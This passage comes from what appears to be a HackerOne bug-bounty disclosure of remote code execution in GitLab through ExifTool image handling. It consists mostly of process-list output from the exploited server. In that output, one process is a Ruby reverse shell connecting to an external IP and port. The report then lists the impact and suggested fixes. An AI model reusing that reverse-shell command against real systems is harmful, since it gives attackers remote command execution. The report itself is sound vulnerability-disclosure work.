2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-14T23:29:47", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-14T23:29:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-14T23:29:47", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": 